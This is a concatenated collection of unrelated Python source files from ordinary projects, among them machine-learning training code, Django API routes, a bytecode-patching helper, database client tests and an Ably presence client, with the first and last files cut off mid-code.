('SSIM', float(our_metric['ssim'])), ('FID', float(our_metric['fid'])),
('LPIPS', float(our_metric['lpips']))]
self.log(logs)
return float(our_metric['psnr']), float(our_metric['ssim']), float(our_metric['fid'])
def sample(self, it=None):
# do not sample when validation set is empty
if len(self.val_dataset) == 0:
return
self.inpaint_model.eval()
with torch.no_grad():
items = next(self.sample_iterator)
for k in items:
if type(items[k]) is torch.Tensor:
items[k] = items[k].to(self.device)
b, _, _, _ = items['edge'].shape
edge_pred, line_pred = SampleEdgeLineLogits(self.inpaint_model.transformer,
context=[items['img_256'][:b, ...],
items['edge_256'][:b, ...],
items['line_256'][:b, ...]],
mask=items['mask_256'][:b, ...].clone(),
iterations=5,
add_v=0.05, mul_v=4,
device=self.device)
edge_pred, line_pred = edge_pred[:b, ...].detach().to(torch.float32), \
line_pred[:b, ...].detach().to(torch.float32)
if self.config.fix_256 is None or self.config.fix_256 is False:
edge_pred = self.inpaint_model.structure_upsample(edge_pred)[0]
edge_pred = torch.sigmoid((edge_pred + 2) * 2)
line_pred = self.inpaint_model.structure_upsample(line_pred)[0]
line_pred = torch.sigmoid((line_pred + 2) * 2)
items['edge'][:b, ...] = edge_pred.detach()
items['line'][:b, ...] = line_pred.detach()
# inpaint model
iteration = self.inpaint_model.iteration
inputs = (items['image'] * (1 - items['mask']))
items = self.inpaint_model(items)
outputs_merged = (items['predicted_image'] * items['mask']) + (items['image'] * (1 - items['mask']))
if it is not None:
iteration = it
image_per_row = 2
if self.config.SAMPLE_SIZE <= 6:
image_per_row = 1
images = stitch_images(
self.postprocess((items['image']).cpu()),
self.postprocess((inputs).cpu()),
self.postprocess(items['edge'].cpu()),
self.postprocess(items['line'].cpu()),
self.postprocess(items['mask'].cpu()),
self.postprocess((items['predicted_image']).cpu()),
self.postprocess((outputs_merged).cpu()),
img_per_row=image_per_row
)
path = os.path.join(self.samples_path, self.model_name)
name = os.path.join(path, str(iteration).zfill(6) + ".jpg")
create_dir(path)
print('\nsaving sample ' + name)
images.save(name)
def log(self, logs):
with open(self.log_file, 'a') as f:
f.write('%s\n' % ' '.join([str(item[0]) + '\t' + str(item[1]) for item in logs]))
def cuda(self, *args):
return (item.to(self.config.DEVICE) for item in args)
def postprocess(self, img):
# [0, 1] => [0, 255]
img = img * 255.0
img = img.permute(0, 2, 3, 1)
return img.int()
|
65185
|
from optparse import make_option
from django.core.management.base import AppCommand
from django.core.management.sql import sql_custom
from django.db import connections, DEFAULT_DB_ALIAS
class Command(AppCommand):
help = "Prints the custom table modifying SQL statements for the given app name(s)."
option_list = AppCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database to print the '
'SQL for. Defaults to the "default" database.'),
)
output_transaction = True
def handle_app(self, app, **options):
return u'\n'.join(sql_custom(app, self.style, connections[options.get('database')])).encode('utf-8')
|
65187
|
from itertools import zip_longest
from typing import List, Union
from bytepatches.ops import Opcode, sync_ops, LOAD_FAST, STORE_FAST, JumpOp, LOAD_NAME, STORE_NAME
from bytepatches.parser import Parser
from bytepatches.utils import patch_function, make_bytecode
class OpNotFound(Exception):
pass
def change_ops(ops: List[Opcode], ops_before: List[Opcode], ops_after: List[Opcode]):
index = 0
found = False
_cache = {}
indices = []
while True:
if index == len(ops):
if not found:
raise OpNotFound("Ops not found!")
break
target = ops[index:index + len(ops_before)]
if target == ops_before:
for existing, op in zip(target, ops_before):
if op is not None and isinstance(op._arg, str):
if op._arg not in _cache:
_cache[op._arg] = [existing]
else:
_cache[op._arg].append(existing)
found = True
indices.append(index)
index += 1
for index in indices:
for before, after in zip_longest(ops_before, ops_after):
if after is not None:
if isinstance(after._arg, str):
target = _cache[after._arg].pop(0)
cls = type(after)
after = cls(target._arg, target.arg, target.val)
if before is None:
# Append after
ops.insert(index, after)
elif after is None:
# Remove before
# We can't pop because that fucks stuff up, but we can set to None and remove later
# Go forwards first
new_target = None
direction = 1
pos = index
target = ops[index]
ops[index] = None
while new_target is None:
pos += direction
try:
new_target = ops[pos]
except IndexError:
direction = -1
for op in ops:
if isinstance(op, JumpOp) and op.val == target:
if op.reljump():
op._arg = new_target.bytecode_pos - op.bytecode_pos
else:
op._arg = new_target.bytecode_pos
op.val = new_target
else:
# Switch ops
for op in ops:
if isinstance(op, JumpOp) and op.val == before:
op.val = after
after.set_bytecode_pos(ops[index].bytecode_pos)
ops[index] = after
index += 1
for index, item in reversed(list(enumerate(ops))):
if item is None:
ops.pop(index)
sync_ops(ops)
def replace(func, before_code: Union[str, List[Opcode]], after_code: Union[str, List[Opcode]], name_to_fast=False):
fn_code = func.__code__
consts = list(fn_code.co_consts)
names = list(fn_code.co_names)
varnames = list(fn_code.co_varnames)
groups = []
if isinstance(before_code, str):
before = compile(before_code, "<input>", "exec")
groups.append(before)
if isinstance(after_code, str):
after = compile(after_code, "<input>", "exec")
groups.append(after)
for group in groups:
for const in group.co_consts:
if const not in consts:
consts.append(const)
for name in group.co_names:
if name not in names:
names.append(name)
for varname in group.co_varnames:
if varname not in varnames:
varnames.append(varname)
if name_to_fast:
for name in names:
if name not in varnames:
varnames.append(name)
if isinstance(before_code, str):
before_ops = Parser(before_code).parse_bytecode(False)
else:
before_ops = before_code
if isinstance(after_code, str):
after_ops = Parser(after_code).parse_bytecode(False)
else:
after_ops = after_code
# TODO: Find a more reliable way to strip LOAD_CONST(None) RETURN_VALUE from code if not in the input
if before_ops[-1].op_name == "RETURN_VALUE" and before_ops[-1].arg is not None and before_ops[-1].arg.arg is None:
before_ops = before_ops[:-2]
after_ops = after_ops[:-2]
if before_ops[-1].op_name == "POP_TOP" and before_ops[-1].arg is None:
before_ops = before_ops[:-1]
after_ops = after_ops[:-1]
if isinstance(before_code, str):
for i, op in enumerate(before_ops):
if name_to_fast:
if op.op_name == "LOAD_NAME":
op = LOAD_FAST(op._arg, op.arg, op.val)
elif op.op_name == "STORE_NAME":
op = STORE_FAST(op._arg, op.arg, op.val)
if "CONST" in op.op_name:
val = before.co_consts[op._arg]
if op._arg != consts.index(val):
op._arg = consts.index(val)
elif "NAME" in op.op_name:
val = before.co_names[op._arg]
if op._arg != names.index(val):
op._arg = names.index(val)
elif "FAST" in op.op_name:
group = before.co_varnames
if name_to_fast:
group += before.co_names
val = group[op._arg]
if op._arg != varnames.index(val):
op._arg = varnames.index(val)
before_ops[i] = op
if isinstance(after_code, str):
for i, op in enumerate(after_ops):
if name_to_fast:
if op.op_name == "LOAD_NAME":
op = LOAD_FAST(op._arg, op.arg, op.val)
elif op.op_name == "STORE_NAME":
op = STORE_FAST(op._arg, op.arg, op.val)
if "CONST" in op.op_name:
val = after.co_consts[op._arg]
if op._arg != consts.index(val):
op._arg = consts.index(val)
elif "NAME" in op.op_name:
val = after.co_names[op._arg]
if op._arg != names.index(val):
op._arg = names.index(val)
elif "FAST" in op.op_name:
group = after.co_varnames
if name_to_fast:
group += after.co_names
val = group[op._arg]
if op._arg != varnames.index(val):
op._arg = varnames.index(val)
after_ops[i] = op
ops = Parser(func).parse_bytecode(False)
change_ops(ops, before_ops, after_ops)
names, varnames = optimize_access(ops)
payload = make_bytecode(ops)
patch_function(func, payload, consts=tuple(consts), names=tuple(names), varnames=tuple(varnames))
return func
def optimize_access(ops: List[Opcode]):
accessed_names = []
accessed_varnames = []
for op in ops:
if isinstance(op, (LOAD_NAME, STORE_NAME)) and op.arg not in accessed_names:
accessed_names.append(op.arg)
elif isinstance(op, (LOAD_FAST, STORE_FAST)) and op.arg not in accessed_varnames:
accessed_varnames.append(op.arg)
accessed_names = tuple(accessed_names)
accessed_varnames = tuple(accessed_varnames)
for op in ops:
if isinstance(op, (LOAD_NAME, STORE_NAME)):
op._arg = accessed_names.index(op.arg)
elif isinstance(op, (LOAD_FAST, STORE_FAST)):
op._arg = accessed_varnames.index(op.arg)
return accessed_names, accessed_varnames
|
65257
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.pension import pension
def test_pension():
"""Test module pension.py by downloading
pension.csv and testing shape of
extracted data has 194 rows and 19 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = pension(test_path)
try:
assert x_train.shape == (194, 19)
except:
shutil.rmtree(test_path)
raise()
|
65287
|
from django.conf.urls import include, url
from rest_framework import routers
from api import views
from django.urls import path
route = routers.DefaultRouter()
route.register(r'user', views.UserViewSet)
route.register(r'store', views.StoreViewSet)
route.register(r'itemCategory', views.ItemCategoryViewSet)
route.register(r'itemSubCategory', views.ItemSubCategoryViewSet)
route.register(r'item', views.ItemViewSet)
route.register(r'shoppingCart', views.ShppingCartViewSet)
route.register(r'trade', views.TradeViewSet)
route.register(r'group', views.GroupViewSet)
route.register(r'storeFollow', views.StoreFollowViewSet)
route.register(r'itemFollow', views.ItemFollowViewSet)
route.register(r'groupFollow', views.GroupFollowViewSet)
route.register(r'banner', views.BannerViewSet)
route.register(r'systemMessage', views.SystemMessageViewSet)
route.register(r'chatMessage', views.ChatMessageViewSet)
route.register(r'coupon', views.CouponViewSet)
route.register(r'dailyOffItem', views.DailyOffItemViewSet)
route.register(r'itemDetailImage', views.ItemDetailImageViewSet)
route.register(r'itemBannerImage', views.ItemBannerImageViewSet)
route.register(r'evaluateImage', views.EvaluateImageViewSet)
route.register(r'address', views.AddressViewSet)
route.register(r'brand', views.BrandViewSet)
route.register(r'collection', views.CollectionViewSet)
route.register(r'browseRecord', views.BrowseRecordViewSet)
route.register(r'searchRecord', views.SearchRecordViewSet)
route.register(r'evaluate', views.EvaluateViewSet)
urlpatterns = [
url('api/', include(route.urls)),
path('api/get_user_cart_item/<int:pk>', views.get_user_cart_item),
path('api/get_user_store_follow/<int:pk>', views.get_user_store_follow),
path('api/get_user_item_follow/<int:pk>', views.get_user_item_follow),
path('api/item_detail_image/<int:pk>', views.item_detail_image),
path('api/item_banner_image/<int:pk>', views.item_banner_image),
path('api/get_user_coupon/<int:pk>', views.get_user_coupon),
path('api/delete_user_collection/', views.delete_user_collection),
path('api/get_user_collection/<int:pk>', views.get_user_collection),
path('api/browse_item/', views.browse_item),
path('api/get_store_evaluate/<int:pk>', views.get_store_evaluate),
path('api/search_content/<int:pk>/', views.search_content),
path('api/whether_user_collect_item/', views.whether_user_collect_item),
path('api/evaluate_image/<int:pk>', views.evaluate_image),
path('api/get_item_evaluate_amount/<int:pk>', views.get_item_evaluate_amount),
path('api/get_item_evaluate_info/<int:pk>', views.get_item_evaluate_info),
path('api/whether_user_buy_item_in_store/', views.whether_user_buy_item_in_store),
path('api/get_item_collection_amount/<int:pk>', views.get_item_collection_amount),
path('api/get_recommend_item/<int:pk>', views.get_recommend_item),
path('api/get_evaluate_type/', views.get_evaluate_type),
path('api/get_wait_receive/', views.get_wait_receive),
path('api/get_wait_evaluate/', views.get_wait_evaluate),
path('api/get_complete_trade/', views.get_complete_trade),
path('api/buy_now/', views.buy_now),
path('api/add_into_cart/', views.add_into_cart),
path('api/buy_in_cart/', views.buy_in_cart),
path('api/confirm_receive/<int:pk>', views.confirm_receive),
path('api/get_history_item/<int:pk>', views.get_history_item),
path('api/get_user_store_info/<int:pk>', views.get_user_store_info),
path('api/update_user_address/', views.update_user_address),
path('api/upload_user_head_image/<int:pk>', views.upload_user_head_image),
path('api/upload_item_preview_image/<int:pk>', views.upload_item_preview_image),
]
|
65303
|
import sys
log_file_path = sys.argv[1]
with open(log_file_path) as f:
lines = f.readlines()
for line in lines:
# Ignore errors from CPU instruction set, symbol existing testing,
# or compilation error formatting
ignored_keywords = [
'src.c',
'CheckSymbolExists.c',
'test_compilation_error_formatting',
]
if all([keyword not in line for keyword in ignored_keywords]):
print(line)
|
65314
|
import asyncio
from couchbase.asynchronous import AsyncSearchResult
from couchbase.asynchronous import AsyncAnalyticsResult
from .fixtures import asynct, AioTestCase
from couchbase.exceptions import CouchbaseException, SearchException, NotSupportedException
from unittest import SkipTest
import couchbase.search as SEARCH
class CouchbaseBeerTest(AioTestCase):
def setUp(self, **kwargs):
try:
return super(CouchbaseBeerTest, self).setUp(
bucket='beer-sample', **kwargs)
except CouchbaseException:
raise SkipTest("Need 'beer-sample' bucket for this")
class CouchbaseBeerKVTest(CouchbaseBeerTest):
def setUp(self):
super(CouchbaseBeerKVTest, self).setUp()
@asynct
@asyncio.coroutine
def test_get_data(self):
connargs = self.make_connargs(bucket='beer-sample')
beer_default_collection = self.gen_collection(**connargs)
yield from (beer_default_collection.on_connect() or asyncio.sleep(0.01))
data = yield from beer_default_collection.get('21st_amendment_brewery_cafe')
self.assertEqual("21st Amendment Brewery Cafe", data.content["name"])
class CouchbaseBeerViewTest(CouchbaseBeerTest):
def setUp(self):
super(CouchbaseBeerViewTest, self).setUp(type='Bucket')
@asynct
@asyncio.coroutine
def test_query(self):
beer_bucket = self.gen_cluster(
**self.make_connargs()).bucket('beer-sample')
yield from (beer_bucket.on_connect() or asyncio.sleep(0.01))
viewiter = beer_bucket.view_query("beer", "brewery_beers", limit=10)
yield from viewiter.future
count = len(list(viewiter))
self.assertEqual(count, 10)
class CouchbaseDefaultTestKV(AioTestCase):
@asynct
@asyncio.coroutine
def test_upsert(self):
import uuid
expected = str(uuid.uuid4())
default_collection = self.gen_collection(**self.make_connargs())
yield from (default_collection.on_connect() or asyncio.sleep(0.01))
yield from default_collection.upsert('hello', {"key": expected})
obtained = yield from default_collection.get('hello')
self.assertEqual({"key": expected}, obtained.content)
class AIOClusterTest(AioTestCase):
def setUp(self, **kwargs):
super(AIOClusterTest, self).setUp(**kwargs)
@asynct
@asyncio.coroutine
def test_n1ql(self):
cluster = self.gen_cluster(**self.make_connargs())
yield from (cluster.on_connect() or asyncio.sleep(0.01))
it = cluster.query(self.query_props.statement)
yield from it.future
data = list(it)
self.assertEqual(self.query_props.rowcount, len(data))
@asynct
@asyncio.coroutine
def test_search(self # type: Base
):
cluster = self.gen_cluster(**self.make_connargs())
yield from (cluster.on_connect() or asyncio.sleep(0.01))
try:
it = cluster.search_query("beer-search", SEARCH.TermQuery("category"),
facets={'fred': SEARCH.TermFacet('category', 10)})
yield from it.future
data = list(it)
self.assertIsInstance(it, AsyncSearchResult)
self.assertEqual(10, len(data))
except SearchException as e:
if isinstance(e.inner_cause,
NotSupportedException) and self.is_mock:
raise SkipTest("Not supported")
class AnalyticsTest(AioTestCase):
def testBatchedAnalytics(self # type: Base
):
cluster = self.gen_cluster(**self.make_connargs())
yield from (cluster.on_connect() or asyncio.sleep(0.01))
it = cluster.analytics_query(
"SELECT * FROM `{}` LIMIT 1".format(self.dataset_name))
yield from it.future
self.assertIsInstance(it, AsyncAnalyticsResult)
self.assertEqual(1, len(it.rows()))
|
65331
|
from typing import Dict
import torch
from torchtyping import TensorType
from typing import Dict, Optional
from tqdm import tqdm
from typeguard import typechecked
"""
# PCA rationale:
# check for the constraints , if small, do nothing
# if needed, project the result onto the constraints using the projection parameters
# pca_reproject(x_after_step, self.proj_params) to go back to plausible values (if epsilon = 0)
# if epsilon non-zero. project onto all evecs (discarded and kept). these are all orthogonal.
# you go one by one. if your in the kept eigenvecs, do nothing. if you're in discarded evecs, you're outside constraint space
# you have a sclar proj per dim. so in those held out dims, you manually set the projs to be epsilon instead of that high projection that you may encounter.
# you modify all the projections onto the discarded evecs. you have a vector which is num_obs x num_evecs. this is the representation of data in the PCA coordinate basis
# then, you modify that representation, and you send it back to the original space using the transpose of the evecs.
# Temporal rationale: want x_t - x_t-1 to be small. compute the difference per timepoint. choose one direction, say forward. you have two points in
# you have 2 points in 2d space. the difference vector is the direction. compute the norm. if norm > epsilon, rescale it so norm is equal to epsilon. diff/epsilon -- now you have a direction and a step size. you define x_t += x_t-1 + diff/epsilon.
# the next time point has to be inside a ball with radius epsilon. if it's outside, you project onto the exterior of that ball. if it's inside, keep it where it is.
# the result will be different if you start from the end or from the beggining.
"""
def MSE(preds: TensorType["num_samples", "num_keypoints",2],
gt: TensorType["num_samples", "num_keypoints",2]):
bp_error = torch.linalg.norm(preds - gt, dim=2) # error per keypoint-frame
average_error = torch.nanmean(bp_error, dim=1) # mean over keypoints
return average_error
@typechecked
class ProjectedGD(object):
""" projected gradient descent on an L2 ball subject to constraints"""
def __init__(
self,
data: TensorType["num_obs", "obs_dim"] = None,
ground_truth: Optional[TensorType["num_obs", "obs_dim"]] = None,
confidences: Optional[TensorType["num_obs", "num_keypoints"]] = None,
proj_params: dict = None,
lr: Optional[float] = None,
max_iter: int = 1000,
tol: float = 1e-5,
verbose: bool = False,
lr_decay_factor: float = 0.25,
):
"""assume you get only the bodyparts of interest for this, irrelevant cols get filtered externally"""
self.max_iter = max_iter
self.tol = tol
self.verbose = verbose
self.data: TensorType["num_samples", "num_keypoints", 2] = data.reshape(data.shape[0], -1, 2)
self.ground_truth: TensorType["num_samples", "num_keypoints", 2] = ground_truth.reshape(ground_truth.shape[0], -1, 2)
self.proj_params = proj_params
self.optimized_preds = self.data.detach().clone() # + torch.randn_like(data)*1e-4 # torch.nn.parameter.Parameter(data=data.detach().clone())
self.x_list = []
self.lr_list = []
self.error_list = []
self.confidences = 1.0
self.lr_decay_factor = lr_decay_factor
if confidences is not None:
self.confidences: TensorType["num_obs", "num_keypoints",1] = confidences.unsqueeze(2)
self.confidences = torch.clamp(confidences, min=0.0, max=1.0)
if lr is not None:
self.lr = lr
else:
self.lr = self.initialize_alpha()
# TODO: modify norm to bo over the last dimension. have num_keypoints norms per sample.
# TODO: everything else can remain in this shape?
# When conf comes in, reshape it similarly.
# currently this is not used.
@staticmethod
def l2_grad(
diffs: TensorType["num_samples", "num_keypoints", 2], scalar: float = 1.0
) -> TensorType["num_samples", "num_keypoints", 2]:
# TODO: test
if torch.allclose(diffs, torch.zeros_like(diffs)):
# don't divide by zero
return diffs
else:
norm: TensorType["num_samples", "num_keypoints",1] = torch.linalg.norm(diffs, dim=2, keepdim=True)
grad = diffs * scalar * (1.0 / norm)
return grad
def grad_step(
self, x_curr: TensorType["num_samples", "num_keypoints", 2]
) -> TensorType["num_samples", "num_keypoints", 2]:
norm: TensorType["num_samples", "num_keypoints", 1] = torch.linalg.norm(x_curr-self.data, dim=2, keepdim=True)
step: TensorType["num_samples", "num_keypoints", 1] = (self.lr * self.confidences) / (norm + 1e-8)
step = torch.clamp(step, min=0.0, max=1.0)
x_after_step = (1-step)*x_curr + step*self.data
return x_after_step
# standard way below
# return x_curr - self.lr * self.l2_grad(x_curr - self.data)
def project(
self, x_after_step: TensorType["num_samples", "num_keypoints", 2]
) -> TensorType["num_samples", "num_keypoints", 2]:
# reshape
x_after_step = x_after_step.reshape(x_after_step.shape[0],-1)
# reproject
reprojected = self.proj_params["pca_singleview"].reproject(x_after_step)
# reshape back
reprojected = reprojected.reshape(x_after_step.shape[0], -1, 2)
return reprojected
def step(
self, x_curr: TensorType["num_samples", "num_keypoints", 2]
) -> TensorType["num_samples", "num_keypoints", 2]:
x_after_step = self.grad_step(x_curr=x_curr) # gradient descent on the l2 norm objective
x_after_projection = self.project(x_after_step=x_after_step) # project the current x onto the constraints, get plausible x
return x_after_projection
def initialize_alpha(self) -> TensorType[(), float]:
# project
projected = self.project(x_after_step=self.data)
# compute the difference
diff = projected - self.data # X_0 - Y
# compute the norm and divide by confidences
alpha = torch.max(torch.norm(diff, dim=2, keepdim=True) / self.confidences)
return alpha
def fit(self) -> TensorType["num_samples", "num_keypoints", 2]:
# TODO: measure RMSE per iteration, run for longer, understand whar it's doing
x_curr = self.optimized_preds.clone()
# project and initialize step size.
for i in tqdm(range(self.max_iter)):
# projected gradient descent step
x_new = self.step(x_curr)
if self.verbose:
print(f"iteration {i}")
print(f"x_curr: {x_curr}")
print(f"x_new: {x_new}")
if torch.allclose(x_curr, x_new, atol=self.tol):
# if no change, you're clamped at step=1.0, too big, decrease and move away from data
self.lr = self.lr * self.lr_decay_factor
x_curr = x_new.clone()
self.error_list.append(MSE(x_curr, self.ground_truth))
self.x_list.append(x_new) # record the new x
self.lr_list.append(self.lr) # record the new step size
self.optimized_preds = x_new
return self.optimized_preds
|
65356
|
from typing import Type
from fpipe.exceptions import FileDataException
from fpipe.file import File
from fpipe.meta.abstract import FileData, T
def meta_prioritized(t: Type[FileData[T]], *sources: File) -> T:
error = FileDataException(t)
for s in sources:
try:
return s[t]
except FileDataException:
pass
raise error
|
65451
|
import json
import lzma
from glob import glob
from pprint import pprint
import pandas as pd
import smart_open
import typer
from tqdm import tqdm
ORDERED_VAR = ["table", "name", "description", "type"]
TEXTTT_VAR = ["table", "name"]
app = typer.Typer()
@app.command()
def sniff(path: str, tar: bool = True, examples: bool = False, break_after: int = None):
"""Print the schema of a JSON file to stdout
Notes:
--tar: for .xz files
--examples/--no-examples: report example for each var
--break-after: number of iterations after which sniffing stops
"""
key_val = {}
i = 0
for file in tqdm(glob(path)):
if tar:
_open = lzma.open
else:
_open = smart_open.open
with _open(file) as f:
for l in tqdm(f):
i += 1
for k, v in json.loads(l).items():
if k in key_val.keys():
if examples:
key_val.update(
{k: (key_val[k][0] + 1, key_val[k][1], key_val[k][2])}
)
else:
key_val.update({k: (key_val[k][0] + 1, key_val[k][1])})
else:
if examples:
key_val.update({k: (1, type(v), v)})
else:
key_val.update({k: (1, type(v))})
if break_after:
if i > break_after:
break
pprint(key_val)
@app.command()
def json2md(file: str):
"""Transform a Json schema to Markdown - Copy to clip-board"""
to_texttt = lambda x: "`" + x + "`"
df = pd.read_json(file)
table = True if "fields" in df.columns else False
if table:
df["table"] = "bibl"
for name, field in df[["name", "fields"]].query("fields==fields").values:
tmp = pd.DataFrame.from_dict(field)
tmp["table"] = name
df = df.append(tmp, sort=False)
df = df[df["fields"].isna()]
# df = df.drop(["mode", "fields"], axis=1)
if not table:
ORDERED_VAR.remove("table")
TEXTTT_VAR.remove("table")
df = df[ORDERED_VAR]
for var in TEXTTT_VAR:
df[var] = df[var].apply(to_texttt)
typer.echo(f"{df.set_index(ORDERED_VAR[0])}")
# typer.secho(message="Table (.md) copied to clip-board", fg=typer.colors.BLUE)
if __name__ == "__main__":
app()
|
65455
|
SECRET_KEY = "abc"
FILEUPLOAD_ALLOWED_EXTENSIONS = ["png"]
# FILEUPLOAD_PREFIX = "/cool/upload"
# FILEUPLOAD_LOCALSTORAGE_IMG_FOLDER = "images/boring/"
FILEUPLOAD_RANDOM_FILE_APPENDIX = True
FILEUPLOAD_CONVERT_TO_SNAKE_CASE = True
|
65457
|
import random
import numpy as np
import cv2
from utils.transforms.transforms import CustomTransform
class RandomFlip(CustomTransform):
def __init__(self, prob_x=0, prob_y=0):
"""
Arguments:
----------
prob_x: range [0, 1], probability to use horizontal flip, setting to 0 means disabling flip
prob_y: range [0, 1], probability to use vertical flip
"""
self.prob_x = prob_x
self.prob_y = prob_y
def __call__(self, sample):
img = sample.get('img').copy()
segLabel = sample.get('segLabel', None)
if segLabel is not None:
segLabel = segLabel.copy()
flip_x = np.random.choice([False, True], p=(1 - self.prob_x, self.prob_x))
flip_y = np.random.choice([False, True], p=(1 - self.prob_y, self.prob_y))
if flip_x:
img = np.ascontiguousarray(np.flip(img, axis=1))
if segLabel is not None:
segLabel = np.ascontiguousarray(np.flip(segLabel, axis=1))
if flip_y:
img = np.ascontiguousarray(np.flip(img, axis=0))
if segLabel is not None:
segLabel = np.ascontiguousarray(np.flip(segLabel, axis=0))
_sample = sample.copy()
_sample['img'] = img
_sample['segLabel'] = segLabel
return _sample
class Darkness(CustomTransform):
def __init__(self, coeff):
assert coeff >= 1., "Darkness coefficient must be greater than 1"
self.coeff = coeff
def __call__(self, sample):
img = sample.get('img')
coeff = np.random.uniform(1., self.coeff)
img = (img.astype('float32') / coeff).astype('uint8')
_sample = sample.copy()
_sample['img'] = img
return _sample
|
65467
|
from head.metrics import *
from head.metrics_parallel import *
HEAD_DICT = {
"Softmax": Softmax,
"ArcFace": ArcFace,
"Combined": Combined,
"CosFace": CosFace,
"SphereFace": SphereFace,
"Am_softmax": Am_softmax,
"CurricularFace": CurricularFace,
"ArcNegFace": ArcNegFace,
"SVX": SVXSoftmax,
"AirFace": AirFace,
"QAMFace": QAMFace,
"CircleLoss": CircleLoss,
"ParallelArcFace": ParallelArcFace,
}
|
65469
|
from text import symbols
class Hparams:
def __init__(self):
################################
# Experiment Parameters #
################################
self.epochs = 500
self.iters_per_checkpoint = 1000
self.iters_per_validation = 1000
self.seed = 1234
self.dynamic_loss_scaling = True
self.fp16_run = False
self.distributed_run = False
self.cudnn_enabled = True
self.cudnn_benchmark = False
self.ignore_layers = ["embedding.weight"]
################################
# Data Parameters #
################################
self.training_files = "DATASET/train.csv.txt"
self.validation_files = "DATASET/val.csv.txt"
self.text_cleaners = ["basic_cleaners"]
self.symbols_lang = "en" # en: English characters; py: Chinese Pinyin symbols
################################
# Model Parameters #
################################
self.tacotron_version = "2" # 1: Tacotron; 2: Tacotron-2
self.tacotron_config = "tacotron2.json"
self.num_symbols = len(symbols(self.symbols_lang))
self.symbols_embed_dim = 512
self.mel_dim = 80
self.r = 3
self.max_decoder_steps = 1000
self.stop_threshold = 0.5
################################
# Optimization Hyperparameters #
################################
self.use_saved_learning_rate = False
self.learning_rate = 1e-3
self.weight_decay = 1e-6
self.grad_clip_thresh = 1.0
self.batch_size = 32
self.mask_padding = True # set model's padded outputs to padded values
def __str__(self):
return "\n".join(
["Hyper Parameters:"]
+ ["{}:{}".format(key, getattr(self, key, None)) for key in self.__dict__]
)
def create_hparams():
"""Create model hyperparameters. Parse nondefault from object args."""
return Hparams()
|
65507
|
import spartan
from spartan import core, expr, util, blob_ctx
import numpy as np
from .qr import qr
def svd(A, k=None):
"""
Stochastic SVD.
Parameters
----------
A : spartan matrix
Array to compute the SVD on, of shape (M, N)
k : int, optional
Number of singular values and vectors to compute.
The operations include matrix multiplication and QR decomposition.
We parallelize both of them.
Returns
--------
U : Spartan array of shape (M, k)
S : numpy array of shape (k,)
V : numpy array of shape (k, k)
"""
if k is None: k = A.shape[1]
Omega = expr.randn(A.shape[1], k)
Y = expr.dot(A, Omega)
Q, R = qr(Y)
B = expr.dot(expr.transpose(Q), A)
BTB = expr.dot(B, expr.transpose(B)).optimized().glom()
S, U_ = np.linalg.eig(BTB)
S = np.sqrt(S)
# Sort by eigen values from large to small
si = np.argsort(S)[::-1]
S = S[si]
U_ = U_[:, si]
U = expr.dot(Q, U_).optimized().evaluate()
V = np.dot(np.dot(expr.transpose(B).optimized().glom(), U_), np.diag(np.ones(S.shape[0]) / S))
return U, S, V.T
|
65528
|
from datetime import datetime, timedelta
from urllib import parse
from ably.http.paginatedresult import PaginatedResult
from ably.types.mixins import EncodeDataMixin
def _ms_since_epoch(dt):
epoch = datetime.utcfromtimestamp(0)
delta = dt - epoch
return int(delta.total_seconds() * 1000)
def _dt_from_ms_epoch(ms):
epoch = datetime.utcfromtimestamp(0)
return epoch + timedelta(milliseconds=ms)
class PresenceAction:
ABSENT = 0
PRESENT = 1
ENTER = 2
LEAVE = 3
UPDATE = 4
class PresenceMessage(EncodeDataMixin):
def __init__(self,
id=None, # TP3a
action=None, # TP3b
client_id=None, # TP3c
connection_id=None, # TP3d
data=None, # TP3e
encoding=None, # TP3f
timestamp=None, # TP3g
member_key=None, # TP3h (for RT only)
extras=None, # TP3i (functionality not specified)
):
self.__id = id
self.__action = action
self.__client_id = client_id
self.__connection_id = connection_id
self.__data = data
self.__encoding = encoding
self.__timestamp = timestamp
self.__member_key = member_key
self.__extras = extras
@property
def id(self):
return self.__id
@property
def action(self):
return self.__action
@property
def client_id(self):
return self.__client_id
@property
def connection_id(self):
return self.__connection_id
@property
def data(self):
return self.__data
@property
def encoding(self):
return self.__encoding
@property
def timestamp(self):
return self.__timestamp
@property
def member_key(self):
if self.connection_id and self.client_id:
return "%s:%s" % (self.connection_id, self.client_id)
@property
def extras(self):
return self.__extras
@staticmethod
def from_encoded(obj, cipher=None):
id = obj.get('id')
action = obj.get('action', PresenceAction.ENTER)
client_id = obj.get('clientId')
connection_id = obj.get('connectionId')
data = obj.get('data')
encoding = obj.get('encoding', '')
timestamp = obj.get('timestamp')
# member_key = obj.get('memberKey', None)
extras = obj.get('extras', None)
if timestamp is not None:
timestamp = _dt_from_ms_epoch(timestamp)
decoded_data = PresenceMessage.decode(data, encoding, cipher)
return PresenceMessage(
id=id,
action=action,
client_id=client_id,
connection_id=connection_id,
timestamp=timestamp,
extras=extras,
**decoded_data
)
class Presence:
def __init__(self, channel):
self.__base_path = '/channels/%s/' % parse.quote_plus(channel.name)
self.__binary = channel.ably.options.use_binary_protocol
self.__http = channel.ably.http
self.__cipher = channel.cipher
def _path_with_qs(self, rel_path, qs=None):
path = rel_path
if qs:
path += ('?' + parse.urlencode(qs))
return path
async def get(self, limit=None):
qs = {}
if limit:
if limit > 1000:
raise ValueError("The maximum allowed limit is 1000")
qs['limit'] = limit
path = self._path_with_qs(self.__base_path + 'presence', qs)
presence_handler = make_presence_response_handler(self.__cipher)
return await PaginatedResult.paginated_query(
self.__http, url=path, response_processor=presence_handler)
async def history(self, limit=None, direction=None, start=None, end=None):
qs = {}
if limit:
if limit > 1000:
raise ValueError("The maximum allowed limit is 1000")
qs['limit'] = limit
if direction:
qs['direction'] = direction
if start:
if isinstance(start, int):
qs['start'] = start
else:
qs['start'] = _ms_since_epoch(start)
if end:
if isinstance(end, int):
qs['end'] = end
else:
qs['end'] = _ms_since_epoch(end)
if 'start' in qs and 'end' in qs and qs['start'] > qs['end']:
raise ValueError("'end' parameter has to be greater than or equal to 'start'")
path = self._path_with_qs(self.__base_path + 'presence/history', qs)
presence_handler = make_presence_response_handler(self.__cipher)
return await PaginatedResult.paginated_query(
self.__http, url=path, response_processor=presence_handler)
def make_presence_response_handler(cipher):
def encrypted_presence_response_handler(response):
messages = response.to_native()
